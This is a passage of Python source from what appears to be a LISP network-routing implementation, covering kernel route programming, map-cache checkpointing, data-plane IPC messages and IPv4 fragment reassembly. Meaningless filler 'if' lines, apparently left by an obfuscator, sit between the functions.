    route_command = "ip route add {} via {}" . format ( eid_prefix , next_hop )
    os . system ( route_command )

    lprint ( "Hardware programmed with commands:" )
    route_command = route_command . replace ( eid_prefix , green ( eid_prefix , False ) )
    lprint ( " " + route_command )
    lprint ( " " + arp_command )
    mac_command = mac_command . replace ( rloc_addr , red ( rloc_addr , False ) )
    lprint ( " " + mac_command )
    return
if 13 - 13: iII111i % oO0o - I11i . i11iIiiIii / iIii1I11I1II1
if 11 - 11: iII111i % OoO0O00 % iIii1I11I1II1 + IiII * Ii1I
if 93 - 93: OOooOOo / iII111i
if 74 - 74: I1ii11iIi11i
if 83 - 83: iII111i + i1IIi - OoooooooOO
if 16 - 16: i1IIi
if 86 - 86: OoOoOO00 - iII111i - Oo0Ooo
def lisp_clear_hardware_walk ( mc , parms ) :
    """
    Map-cache walker callback: delete the kernel route installed for one
    entry's EID-prefix.  Always returns [True, None] so the walk continues.
    """
    os . system ( "ip route delete {}" . format ( mc . eid . print_prefix_no_iid ( ) ) )
    return ( [ True , None ] )
if 33 - 33: Ii1I - OoO0O00
if 15 - 15: O0 . iIii1I11I1II1 - I1Ii111 + O0 + ooOoO0o / I1IiiI
if 8 - 8: iII111i % O0 - OoOoOO00
if 49 - 49: oO0o - OOooOOo / Ii1I / I1Ii111 . o0oOOo0O0Ooo . iII111i
if 58 - 58: IiII + Ii1I
if 89 - 89: Ii1I / Oo0Ooo * o0oOOo0O0Ooo / OoO0O00 + I11i
if 4 - 4: I11i
if 59 - 59: OoOoOO00 * I1ii11iIi11i / I1IiiI * II111iiii + OoOoOO00
def lisp_clear_map_cache ( ) :
    """
    Clear the map-cache on user request, along with every data structure
    derived from it (RLOC-probe list, per-RLOC crypto keys, RTR list,
    gleaned groups), then tell the external data-plane to restart.
    """
    global lisp_map_cache , lisp_rloc_probe_list
    global lisp_crypto_keys_by_rloc_encap , lisp_crypto_keys_by_rloc_decap
    global lisp_rtr_list , lisp_gleaned_groups

    banner = bold ( "User cleared" , False )
    entries = lisp_map_cache . cache_count
    lprint ( "{} map-cache with {} entries" . format ( banner , entries ) )

    #
    # Remove kernel routes installed for hardware before dropping the cache.
    #
    if ( lisp_program_hardware ) :
        lisp_map_cache . walk_cache ( lisp_clear_hardware_walk , None )
    lisp_map_cache = lisp_cache ( )

    #
    # Reset all cache-derived state.
    #
    lisp_rloc_probe_list = { }
    lisp_crypto_keys_by_rloc_encap = { }
    lisp_crypto_keys_by_rloc_decap = { }
    lisp_rtr_list = { }
    lisp_gleaned_groups = { }

    #
    # Tell the external data-plane to flush as well.
    #
    lisp_process_data_plane_restart ( True )
    return
if 4 - 4: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 / I1IiiI . OoOoOO00 . iII111i / IiII
if 65 - 65: Ii1I + IiII + I11i / I1Ii111 % iIii1I11I1II1
if 17 - 17: I1ii11iIi11i * OOooOOo % II111iiii
if 30 - 30: I1Ii111 . Ii1I . Oo0Ooo / OOooOOo * OoooooooOO / I1ii11iIi11i
if 41 - 41: i1IIi
if 75 - 75: o0oOOo0O0Ooo . I1Ii111 - I1Ii111 % Ii1I * OoooooooOO
if 99 - 99: OOooOOo + o0oOOo0O0Ooo - OOooOOo . i1IIi
if 86 - 86: Ii1I % oO0o - i11iIiiIii - O0 + IiII + iII111i
if 100 - 100: OoO0O00 . Oo0Ooo
if 29 - 29: OoO0O00
def lisp_encapsulate_rloc_probe ( lisp_sockets , rloc , nat_info , packet ) :
    """
    Data-encapsulate an RLOC-probe control message for NAT traversal:
    prepend an IPv4+UDP header addressed from our first RLOC to 'rloc'
    (UDP dest LISP_CTRL_PORT), wrap it in a lisp_packet, and send it on
    the data socket (lisp_sockets[3]).
    """
    if ( len ( lisp_sockets ) != 4 ) : return

    local_rloc = lisp_myrlocs [ 0 ]

    #
    # Build the inner IPv4 header (20 bytes, TTL 64, protocol 17/UDP) and
    # checksum it; total length covers IP + 8-byte UDP header.
    #
    total_length = len ( packet ) + 28
    ip = struct . pack ( "BBHIBBHII" , 0x45 , 0 , socket . htons ( total_length ) , 0 , 64 ,
        17 , 0 , socket . htonl ( local_rloc . address ) , socket . htonl ( rloc . address ) )
    ip = lisp_ip_checksum ( ip )

    udp = struct . pack ( "HHHH" , 0 , socket . htons ( LISP_CTRL_PORT ) ,
        socket . htons ( total_length - 20 ) , 0 )

    packet = lisp_packet ( ip + udp + packet )

    #
    # Fill in inner/outer addressing for the LISP data encapsulation.
    # Instance-id 0xffffff marks the control-message encapsulation.
    #
    packet . inner_dest . copy_address ( rloc )
    packet . inner_dest . instance_id = 0xffffff
    packet . inner_source . copy_address ( local_rloc )
    packet . inner_ttl = 64
    packet . outer_dest . copy_address ( rloc )
    packet . outer_source . copy_address ( local_rloc )
    packet . outer_version = packet . outer_dest . afi_to_version ( )
    packet . outer_ttl = 64
    packet . encap_port = nat_info . port if nat_info else LISP_DATA_PORT

    rloc_str = red ( rloc . print_address_no_iid ( ) , False )
    if ( nat_info ) :
        hostname = " {}" . format ( blue ( nat_info . hostname , False ) )
        probe = bold ( "RLOC-probe request" , False )
    else :
        hostname = ""
        probe = bold ( "RLOC-probe reply" , False )

    lprint ( ( "Data encapsulate {} to {}{} port {} for " + "NAT-traversal" ) . format ( probe , rloc_str , hostname , packet . encap_port ) )

    #
    # Encode and transmit; encode(None) returns None on failure.
    #
    if ( packet . encode ( None ) == None ) : return
    packet . print_packet ( "Send" , True )

    data_socket = lisp_sockets [ 3 ]
    packet . send_packet ( data_socket , packet . outer_dest )
    del ( packet )
    return
if 95 - 95: i1IIi . I11i - OoO0O00 * Ii1I + OOooOOo + iII111i
if 96 - 96: I1IiiI
if 62 - 62: I1Ii111
if 96 - 96: ooOoO0o % I11i + o0oOOo0O0Ooo / I1Ii111 * I1Ii111 . OoO0O00
if 84 - 84: i1IIi - I1Ii111 - IiII * i1IIi
if 36 - 36: o0oOOo0O0Ooo % I11i % iII111i % O0
if 3 - 3: I1ii11iIi11i / O0 * II111iiii . O0
if 86 - 86: iIii1I11I1II1
def lisp_get_default_route_next_hops():
    """Return the system's default-route next-hops as [[device, gateway], ...].

    On macOS, parses 'route -n get default' (single next-hop). On Linux,
    parses 'ip route' default entries, skipping routes that carry a
    'metric' field. Presumably multiple entries mean ECMP defaults —
    callers iterate the list.
    """
    if (lisp_is_macos()):
        command = "route -n get default"
        output_lines = commands.getoutput(command).split("\n")

        gateway = device = None
        for output_line in output_lines:
            if (output_line.find("gateway: ") != -1):
                gateway = output_line.split(": ")[1]
            if (output_line.find("interface: ") != -1):
                device = output_line.split(": ")[1]
        return([[device, gateway]])

    #
    # Linux path. Ignore default routes with metrics (secondary defaults).
    #
    command = "ip route | egrep 'default via'"
    default_routes = commands.getoutput(command).split("\n")

    next_hops = []
    for route in default_routes:
        if (route.find(" metric ") != -1): continue
        fields = route.split(" ")

        # Guard both the missing-keyword case (ValueError from index())
        # and a keyword that is the last token on the line.
        try:
            gw_index = fields.index("via") + 1
            if (gw_index >= len(fields)): continue
            dev_index = fields.index("dev") + 1
            if (dev_index >= len(fields)): continue
        except:
            continue

        next_hops.append([fields[dev_index], fields[gw_index]])
    return(next_hops)
if 8 - 8: oO0o - O0 % I1IiiI . I1ii11iIi11i / I11i / I1Ii111
if 18 - 18: Oo0Ooo % I1ii11iIi11i
if 90 - 90: iII111i . O0
if 6 - 6: I1IiiI + o0oOOo0O0Ooo . OoooooooOO * oO0o + OoooooooOO
if 77 - 77: II111iiii / I1Ii111 * i11iIiiIii + OoooooooOO
if 4 - 4: iIii1I11I1II1 - Oo0Ooo / OOooOOo % OoooooooOO . Oo0Ooo - Oo0Ooo
if 41 - 41: II111iiii . o0oOOo0O0Ooo
def lisp_get_host_route_next_hop(rloc):
    """Return the next-hop address of the host route for 'rloc'.

    Greps 'ip route' output for '<rloc> via'; returns None when no such
    route exists or the line is malformed.
    """
    command = "ip route | egrep '{} via'".format(rloc)
    fields = commands.getoutput(command).split(" ")

    try:
        nh_index = fields.index("via") + 1
    except:
        return(None)

    if (nh_index >= len(fields)): return(None)
    return(fields[nh_index])
if 15 - 15: OoO0O00
if 37 - 37: OoO0O00 . OoooooooOO - OOooOOo
if 34 - 34: o0oOOo0O0Ooo + iIii1I11I1II1 / o0oOOo0O0Ooo / ooOoO0o
if 53 - 53: II111iiii / iIii1I11I1II1
if 25 - 25: I1Ii111
if 58 - 58: OoOoOO00 * i1IIi
if 20 - 20: IiII
def lisp_install_host_route(dest, nh, install):
    """Add or delete a /32 host route for 'dest' via 'nh' using 'ip route'.

    install=True adds the route, install=False deletes it. nh may be None,
    in which case no 'via' clause is emitted.
    """
    install = "add" if install else "delete"
    nh_string = "none" if nh == None else nh

    lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_string))

    if (nh == None):
        command = "ip route {} {}/32".format(install, dest)
    else:
        command = "ip route {} {}/32 via {}".format(install, dest, nh)

    os.system(command)
    return
if 22 - 22: ooOoO0o . ooOoO0o * OOooOOo % OoOoOO00
if 51 - 51: OoOoOO00 . oO0o - OoOoOO00
if 79 - 79: iII111i
if 71 - 71: i1IIi / OoO0O00 / OOooOOo + I1Ii111
if 80 - 80: Oo0Ooo . iIii1I11I1II1 . OoooooooOO % iII111i . oO0o
if 10 - 10: i11iIiiIii * OoooooooOO . i11iIiiIii
if 35 - 35: OOooOOo * OOooOOo + o0oOOo0O0Ooo / i1IIi - I11i
if 12 - 12: I1ii11iIi11i - i11iIiiIii + I1IiiI . Oo0Ooo
def lisp_checkpoint(checkpoint_list):
    """Write each pre-formatted checkpoint entry to the checkpoint file.

    No-op unless the lisp_checkpoint_map_cache feature flag is set. Each
    element of checkpoint_list is one line (built elsewhere by
    lisp_write_checkpoint_entry-style formatting).
    """
    if (lisp_checkpoint_map_cache == False): return

    checkpoint_file = open(lisp_checkpoint_filename, "w")
    for entry in checkpoint_list:
        checkpoint_file.write(entry + "\n")
    checkpoint_file.close()

    lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
        len(checkpoint_list), lisp_checkpoint_filename))
    return
if 16 - 16: Ii1I / I1IiiI / I1IiiI - OoooooooOO
if 13 - 13: OOooOOo / OoooooooOO
if 7 - 7: II111iiii - ooOoO0o
if 72 - 72: Ii1I
if 27 - 27: ooOoO0o / IiII + OoO0O00 + Ii1I % I1Ii111
if 86 - 86: O0 % i11iIiiIii - Ii1I * oO0o % OOooOOo * i1IIi
if 87 - 87: II111iiii
if 53 - 53: OoOoOO00 * i11iIiiIii / I1Ii111
def lisp_load_checkpoint():
    """Load map-cache entries from the checkpoint file written earlier.

    Each line is '<eid-prefix> rloc <addr> <prio> <weight>, ...' or
    '<eid-prefix> rloc native-forward'. Entries are marked as checkpoint
    entries and given an NMR-based TTL. No-op unless checkpointing is
    enabled and the file exists.
    """
    if (lisp_checkpoint_map_cache == False): return
    if (os.path.exists(lisp_checkpoint_filename) == False): return

    checkpoint_file = open(lisp_checkpoint_filename, "r")

    count = 0
    for entry in checkpoint_file:
        count += 1
        eid_and_rlocs = entry.split(" rloc ")

        # An empty or 'native-forward' RLOC part means no RLOC-set.
        if (eid_and_rlocs[1] in ["native-forward\n", "\n"]):
            rloc_strings = []
        else:
            rloc_strings = eid_and_rlocs[1].split(", ")

        rloc_set = []
        for rloc_string in rloc_strings:
            rloc_entry = lisp_rloc(False)
            fields = rloc_string.split(" ")
            rloc_entry.rloc.store_address(fields[0])
            rloc_entry.priority = int(fields[1])
            rloc_entry.weight = int(fields[2])
            rloc_set.append(rloc_entry)

        mc = lisp_mapping("", "", rloc_set)
        if (mc != None):
            mc.eid.store_prefix(eid_and_rlocs[0])
            mc.checkpoint_entry = True
            mc.map_cache_ttl = LISP_NMR_TTL * 60
            if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
            mc.add_cache()
            continue

        # Mapping could not be built; do not count this line.
        count -= 1

    checkpoint_file.close()
    lprint("{} {} map-cache entries from file '{}'".format(
        bold("Loaded", False), count, lisp_checkpoint_filename))
    return
if 1 - 1: II111iiii
if 22 - 22: I1Ii111 + iII111i
if 50 - 50: iII111i % OoOoOO00 - II111iiii + II111iiii / OoO0O00
if 69 - 69: Ii1I * II111iiii
if 24 - 24: I1Ii111 * I1ii11iIi11i . OOooOOo . I1IiiI - I1ii11iIi11i
if 56 - 56: I1IiiI * Oo0Ooo + OoO0O00 - oO0o * I1Ii111
if 68 - 68: ooOoO0o * i11iIiiIii * OOooOOo % iII111i
if 10 - 10: Ii1I / Oo0Ooo - i1IIi
if 11 - 11: I11i * iII111i
if 28 - 28: II111iiii + IiII / Oo0Ooo * I1IiiI - OOooOOo
if 2 - 2: oO0o + I11i / I1Ii111 . I11i
if 59 - 59: Ii1I
if 47 - 47: iII111i % iII111i
if 81 - 81: oO0o / I1ii11iIi11i . OoooooooOO % II111iiii / oO0o
def lisp_write_checkpoint_entry(checkpoint_list, mc):
    """Append one formatted checkpoint line for map-cache entry 'mc'.

    Format: '<eid-prefix> rloc <addr> <prio> <weight>, ...' — or
    '<eid-prefix> rloc native-forward' when the entry has no RLOC-set and
    a native-forward action. No-op unless checkpointing is enabled.
    """
    if (lisp_checkpoint_map_cache == False): return

    entry = "{} rloc ".format(mc.eid.print_prefix())

    for rloc_entry in mc.rloc_set:
        if (rloc_entry.rloc.is_null()): continue
        entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
            rloc_entry.priority, rloc_entry.weight)

    if (mc.rloc_set != []):
        entry = entry[0:-2]          # strip trailing ", "
    elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
        entry += "native-forward"

    checkpoint_list.append(entry)
    return
if 27 - 27: II111iiii * OoooooooOO / Oo0Ooo % O0
if 41 - 41: oO0o / iIii1I11I1II1 % iII111i - I1Ii111 % I11i * i11iIiiIii
if 21 - 21: O0
if 14 - 14: IiII / I1ii11iIi11i + Ii1I
if 48 - 48: I1Ii111 * oO0o / o0oOOo0O0Ooo * OoOoOO00 * ooOoO0o
if 38 - 38: I1IiiI * Ii1I + Oo0Ooo - OoooooooOO
if 63 - 63: I1ii11iIi11i
def lisp_check_dp_socket():
    """Return True when the data-plane IPC named socket exists on disk."""
    socket_name = lisp_ipc_dp_socket_name
    if (os.path.exists(socket_name) == False):
        not_there = bold("does not exist", False)
        lprint("Socket '{}' {}".format(socket_name, not_there))
        return(False)
    return(True)
if 28 - 28: iIii1I11I1II1
if 49 - 49: II111iiii * Oo0Ooo
if 74 - 74: OOooOOo % I1ii11iIi11i
if 83 - 83: OoO0O00 + O0
if 95 - 95: i1IIi % I11i
if 75 - 75: I11i * Oo0Ooo
if 73 - 73: O0
def lisp_write_to_dp_socket(entry):
    """JSON-encode 'entry' and send it on the data-plane IPC named socket.

    Best-effort: any failure (encode or send) is logged and swallowed.
    Fix: the JSON string is initialized before the try block — previously,
    if json.dumps() itself raised, the except handler referenced an
    unbound local and crashed with NameError instead of logging.
    """
    json_string = ""
    try:
        json_string = json.dumps(entry)
        write = bold("Write IPC", False)
        lprint("{} record to named socket: '{}'".format(write, json_string))
        lisp_ipc_dp_socket.sendto(json_string, lisp_ipc_dp_socket_name)
    except:
        lprint("Failed to write IPC record to named socket: '{}'".format(json_string))

    return
if 14 - 14: i11iIiiIii . I1Ii111 % I1ii11iIi11i . I1ii11iIi11i % IiII
if 93 - 93: iIii1I11I1II1 / IiII
if 91 - 91: i11iIiiIii % ooOoO0o - iII111i * I1Ii111 . i11iIiiIii
if 1 - 1: IiII + iIii1I11I1II1 * I1ii11iIi11i - IiII - i1IIi
if 75 - 75: II111iiii * o0oOOo0O0Ooo / I1ii11iIi11i
if 46 - 46: OOooOOo
if 67 - 67: OoO0O00 . I11i % OOooOOo + Oo0Ooo
if 40 - 40: OoO0O00 / I11i % iIii1I11I1II1 - ooOoO0o
if 51 - 51: Oo0Ooo % iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo
def lisp_write_ipc_keys(rloc):
    """Push refreshed map-cache IPC records for every EID that uses 'rloc'.

    Looks up the RLOC (with ':port' suffix when NAT-translated) in the
    RLOC-probe list and re-sends an 'add' map-cache IPC message for each
    map-cache entry found.
    """
    addr_str = rloc.rloc.print_address_no_iid()
    port = rloc.translated_port
    if (port != 0): addr_str += ":" + str(port)
    if ((addr_str in lisp_rloc_probe_list) == False): return

    for probe_rloc, eid, group in lisp_rloc_probe_list[addr_str]:
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc == None): continue
        lisp_write_ipc_map_cache(True, mc)

    return
if 20 - 20: OoooooooOO * OOooOOo
if 77 - 77: Ii1I - OoooooooOO . OoOoOO00
if 93 - 93: OoooooooOO / I1Ii111
if 91 - 91: I1Ii111
if 18 - 18: ooOoO0o * I11i
if 53 - 53: I11i . i11iIiiIii - iIii1I11I1II1 / I1Ii111
if 86 - 86: i1IIi % OoO0O00 - OoooooooOO
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
    """Build (and normally send) a 'map-cache' IPC record for entry 'mc'.

    add_or_delete=True emits opcode 'add', False emits 'delete'. Multicast
    entries (non-null group) carry an 'rles' list built from the first
    RLOC's RLE forwarding list; unicast entries carry an 'rlocs' list of
    up, IPv4/IPv6 RLOCs. Encryption keys, when present, are attached via
    lisp_build_json_keys(). Returns the record; dont_send=True suppresses
    the socket write (caller just wants the dict).
    """
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    opcode = "add" if add_or_delete else "delete"
    entry = {"type": "map-cache", "opcode": opcode}

    multicast = (mc.group.is_null() == False)
    if (multicast):
        entry["eid-prefix"] = mc.group.print_prefix_no_iid()
        entry["rles"] = []
    else:
        entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
        entry["rlocs"] = []

    entry["instance-id"] = str(mc.eid.instance_id)

    if (multicast):
        #
        # Multicast: walk the replication-list (RLE) of the first RLOC.
        #
        if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
            for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
                address = rle_node.address.print_address_no_iid()
                port = str(4341) if rle_node.translated_port == 0 else \
                    str(rle_node.translated_port)

                record = {"rle": address, "port": port}
                ekey, ikey = rle_node.get_encap_keys()
                record = lisp_build_json_keys(record, ekey, ikey,
                    "encrypt-key")
                entry["rles"].append(record)
    else:
        #
        # Unicast: include only up IPv4/IPv6 RLOCs.
        #
        for rloc_entry in mc.rloc_set:
            if (rloc_entry.rloc.is_ipv4() == False and
                rloc_entry.rloc.is_ipv6() == False):
                continue

            if (rloc_entry.up_state() == False): continue

            port = str(4341) if rloc_entry.translated_port == 0 else \
                str(rloc_entry.translated_port)

            record = {"rloc": rloc_entry.rloc.print_address_no_iid(),
                "priority": str(rloc_entry.priority),
                "weight": str(rloc_entry.weight), "port": port}
            ekey, ikey = rloc_entry.get_encap_keys()
            record = lisp_build_json_keys(record, ekey, ikey, "encrypt-key")
            entry["rlocs"].append(record)

    if (dont_send == False): lisp_write_to_dp_socket(entry)
    return(entry)
if 46 - 46: I1IiiI % oO0o . OoooooooOO . IiII / I11i - i1IIi
if 43 - 43: OoOoOO00 - o0oOOo0O0Ooo
if 22 - 22: i1IIi
if 33 - 33: O0
if 34 - 34: I1Ii111 . IiII % iII111i
if 94 - 94: OOooOOo % i11iIiiIii . OOooOOo
if 55 - 55: OoOoOO00 . OoOoOO00 % o0oOOo0O0Ooo . I11i . I1ii11iIi11i - o0oOOo0O0Ooo
def lisp_write_ipc_decap_key(rloc_addr, keys):
    """Send a 'decap-keys' IPC record carrying decrypt/ICV keys for an RLOC.

    'rloc_addr' may be 'addr' or 'addr:port'; the port, when present,
    becomes a separate field. Uses key-id 1 from 'keys' (index 1); no-op
    when there is no such key, or on an ITR, or without a usable socket.
    """
    if (lisp_i_am_itr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    #
    # Need a key-id 1 entry to have anything to announce.
    #
    if (keys == None or len(keys) == 0 or keys[1] == None): return

    ekey = keys[1].encrypt_key
    ikey = keys[1].icv_key

    addr_and_port = rloc_addr.split(":")
    if (len(addr_and_port) == 1):
        entry = {"type": "decap-keys", "rloc": addr_and_port[0]}
    else:
        entry = {"type": "decap-keys", "rloc": addr_and_port[0],
            "port": addr_and_port[1]}

    entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")

    lisp_write_to_dp_socket(entry)
    return
if 95 - 95: ooOoO0o % OOooOOo
if 17 - 17: i1IIi + Ii1I
if 35 - 35: iIii1I11I1II1 - Oo0Ooo - OoooooooOO % I1ii11iIi11i
if 27 - 27: Oo0Ooo * II111iiii - OOooOOo + o0oOOo0O0Ooo
if 26 - 26: oO0o / I1ii11iIi11i - oO0o
if 9 - 9: ooOoO0o * iIii1I11I1II1 * OoooooooOO
if 13 - 13: iII111i . i11iIiiIii * o0oOOo0O0Ooo . iII111i
if 96 - 96: Ii1I
def lisp_build_json_keys(entry, ekey, ikey, key_type):
    """Attach a one-element 'keys' list to IPC record 'entry'.

    key_type is the JSON field name for the encryption key (e.g.
    'encrypt-key' or 'decrypt-key'). When ekey is None the record is
    returned untouched. Mutates and returns 'entry'.
    """
    if (ekey == None): return(entry)

    entry["keys"] = [{"key-id": "1", key_type: ekey, "icv-key": ikey}]
    return(entry)
if 93 - 93: i11iIiiIii / Ii1I * Oo0Ooo . iII111i % iII111i / IiII
if 15 - 15: OoOoOO00 % I1Ii111 - iIii1I11I1II1
if 52 - 52: i11iIiiIii * ooOoO0o
if 15 - 15: OoooooooOO . oO0o . i11iIiiIii / o0oOOo0O0Ooo
if 91 - 91: ooOoO0o
if 47 - 47: II111iiii + I11i + ooOoO0o % Oo0Ooo / iII111i
if 9 - 9: O0 + IiII
def lisp_write_ipc_database_mappings(ephem_port):
    """Send the ETR's database-mappings plus its NAT ephemeral port over IPC.

    Emits one 'database-mappings' record listing every IPv4/IPv6 database
    EID-prefix, then a separate 'etr-nat-port' record with 'ephem_port'.
    ETR-only; no-op without a usable IPC socket.
    """
    if (lisp_i_am_etr == False): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    entry = {"type": "database-mappings", "database-mappings": []}

    #
    # Only address-family EIDs go to the data-plane.
    #
    for db in lisp_db_list:
        if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
        record = {"instance-id": str(db.eid.instance_id),
            "eid-prefix": db.eid.print_prefix_no_iid()}
        entry["database-mappings"].append(record)

    lisp_write_to_dp_socket(entry)

    #
    # Tell the data-plane which ephemeral port NAT-traversal uses.
    #
    entry = {"type": "etr-nat-port", "port": ephem_port}
    lisp_write_to_dp_socket(entry)
    return
if 64 - 64: I1ii11iIi11i . i1IIi % II111iiii % Oo0Ooo + oO0o - I1IiiI
if 24 - 24: IiII . II111iiii . II111iiii . OoOoOO00 . i11iIiiIii
if 11 - 11: Ii1I
if 82 - 82: I11i - i1IIi . Oo0Ooo * I1Ii111
if 44 - 44: iII111i
if 56 - 56: II111iiii / Oo0Ooo % IiII * II111iiii - iIii1I11I1II1 + ooOoO0o
if 33 - 33: o0oOOo0O0Ooo . I11i / I1IiiI
def lisp_write_ipc_interfaces():
    """Send an 'interfaces' IPC record mapping devices to instance-IDs.

    Only interfaces with a configured instance-id are included. Not sent
    on an ETR; no-op without a usable IPC socket.
    """
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    entry = {"type": "interfaces", "interfaces": []}

    for interface in lisp_myinterfaces.values():
        if (interface.instance_id == None): continue
        record = {"interface": interface.device,
            "instance-id": str(interface.instance_id)}
        entry["interfaces"].append(record)

    lisp_write_to_dp_socket(entry)
    return
if 53 - 53: I1Ii111 % i11iIiiIii
if 99 - 99: I1IiiI - i1IIi * i11iIiiIii + OoO0O00
if 80 - 80: o0oOOo0O0Ooo . I11i % iIii1I11I1II1 + OoOoOO00
if 87 - 87: I1Ii111 + II111iiii / I1ii11iIi11i + OoOoOO00
if 71 - 71: I1IiiI + iIii1I11I1II1 + O0 * iII111i % IiII
if 42 - 42: OOooOOo - I1ii11iIi11i
if 93 - 93: I1Ii111 + OOooOOo % ooOoO0o / I1Ii111 % OOooOOo . IiII
if 37 - 37: iII111i * oO0o / oO0o / Ii1I % I11i
if 12 - 12: i11iIiiIii
if 62 - 62: oO0o + OOooOOo + oO0o + I1IiiI
if 10 - 10: IiII - Oo0Ooo % ooOoO0o
if 38 - 38: oO0o * o0oOOo0O0Ooo . I11i % II111iiii / I11i % Ii1I
if 19 - 19: II111iiii / i11iIiiIii * II111iiii + OoOoOO00 - OoOoOO00
if 7 - 7: OoOoOO00 - OoO0O00 % OoOoOO00 . I1ii11iIi11i % Oo0Ooo * iII111i
def lisp_parse_auth_key(value):
    """Parse an authentication-key config value into {key-id: key}.

    A plain value (no '[') maps to key-id 0. Otherwise the value is a
    concatenation of '[<id>]<key>' segments, one dict entry each.
    Returns None when a key-id is not an integer (preserves the original
    inconsistent-return behavior callers may rely on).
    """
    segments = value.split("[")
    auth_keys = {}

    # No bracket syntax at all: single key with implicit key-id 0.
    if (len(segments) == 1):
        auth_keys[0] = value
        return(auth_keys)

    for segment in segments:
        if (segment == ""): continue
        close = segment.find("]")
        key_id = segment[0:close]
        try:
            key_id = int(key_id)
        except:
            return

        auth_keys[key_id] = segment[close + 1::]

    return(auth_keys)
if 54 - 54: IiII * i11iIiiIii . ooOoO0o . Ii1I
if 60 - 60: Oo0Ooo % I11i - OoOoOO00 % II111iiii
if 82 - 82: OoooooooOO % IiII / i11iIiiIii
if 100 - 100: Ii1I / I1ii11iIi11i + OOooOOo + I1Ii111 / IiII
if 13 - 13: IiII + iII111i . I1Ii111 - iII111i - o0oOOo0O0Ooo
if 72 - 72: II111iiii . I11i % I1Ii111 % I1ii11iIi11i
if 9 - 9: OoOoOO00 * II111iiii
if 21 - 21: OoooooooOO
if 34 - 34: i11iIiiIii / I1Ii111 - o0oOOo0O0Ooo / i1IIi * I11i
if 87 - 87: IiII / I1IiiI . OoOoOO00
if 80 - 80: i1IIi + OOooOOo % i11iIiiIii * I1ii11iIi11i
if 49 - 49: iIii1I11I1II1
if 2 - 2: OOooOOo * o0oOOo0O0Ooo - OOooOOo . I11i
if 32 - 32: OoO0O00
if 34 - 34: O0 * iIii1I11I1II1 . o0oOOo0O0Ooo . I1Ii111 . iIii1I11I1II1 * iIii1I11I1II1
if 38 - 38: iIii1I11I1II1
def lisp_reassemble(packet):
    """Reassemble an IPv4 fragment; return the full packet or None.

    'packet' is a raw IPv4 header+payload string. Non-fragmented packets
    (frag field 0 or DF-only 0x4000) pass straight through. Fragments are
    queued per IP-ID in lisp_reassembly_queue until the chain is complete
    and contiguous, then spliced together with a rewritten header
    (new total-length, zeroed frag field, recomputed checksum).
    First fragments that are clearly not LISP encapsulated (UDP ports not
    in {4341, 8472, 4789}) poison the queue so later fragments of the
    same packet are dropped.
    """
    frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])

    #
    # Not a fragment (or DF set with zero offset) — nothing to do.
    #
    if (frag_field == 0 or frag_field == 0x4000): return(packet)

    packet_id = socket.ntohs(struct.unpack("H", packet[4:6])[0])
    total_length = socket.ntohs(struct.unpack("H", packet[2:4])[0])

    # Last fragment: more-fragments clear, non-zero offset.
    last_frag = (frag_field & 0x2000 == 0 and (frag_field & 0x1fff) != 0)
    entry = [(frag_field & 0x1fff) * 8, total_length - 20, packet, last_frag]

    #
    # First fragment (MF set, offset 0): peek at the UDP ports; if this
    # is not LISP traffic, mark the queue poisoned (packet None).
    #
    if (frag_field == 0x2000):
        sport, dport = struct.unpack("HH", packet[20:24])
        sport = socket.ntohs(sport)
        dport = socket.ntohs(dport)
        if (dport not in [4341, 8472, 4789] and sport != 4341):
            lisp_reassembly_queue[packet_id] = []
            entry[2] = None

    if ((packet_id in lisp_reassembly_queue) == False):
        lisp_reassembly_queue[packet_id] = []

    queue = lisp_reassembly_queue[packet_id]

    #
    # Queue was poisoned by a non-LISP first fragment — drop followers.
    #
    if (len(queue) == 1 and queue[0][2] == None):
        dprint("Drop non-LISP encapsulated fragment 0x{}".format(
            lisp_hex_string(packet_id).zfill(4)))
        return(None)

    # Mutate the shared queue, then work on a sorted copy (by offset).
    queue.append(entry)
    queue = sorted(queue)

    address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    address.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    source = address.print_address_no_iid()
    address.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
    dest = address.print_address_no_iid()
    rloc_str = red("{} -> {}".format(source, dest), False)

    dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format(
        bold("Received", False),
        " non-LISP encapsulated" if entry[2] == None else "", rloc_str,
        lisp_hex_string(packet_id).zfill(4),
        lisp_hex_string(frag_field).zfill(4)))

    #
    # Complete only when the first offset is 0, the last fragment has
    # arrived, and every pair of adjacent fragments is contiguous.
    #
    if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
    previous = queue[0]
    for frag in queue[1::]:
        offset = frag[0]
        prev_offset, prev_len = previous[0], previous[1]
        if (prev_offset + prev_len != offset): return(None)
        previous = frag

    lisp_reassembly_queue.pop(packet_id)

    #
    # Splice: first fragment keeps its IP header, the rest contribute
    # payload only (skip their 20-byte headers).
    #
    packet = queue[0][2]
    for frag in queue[1::]: packet += frag[2][20::]

    dprint("{} fragments arrived for packet 0x{}, length {}".format(
        bold("All", False), lisp_hex_string(packet_id).zfill(4),
        len(packet)))

    #
    # Rewrite header: new total-length, clear IP-ID and frag field, then
    # recompute the header checksum.
    #
    length = socket.htons(len(packet))
    header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
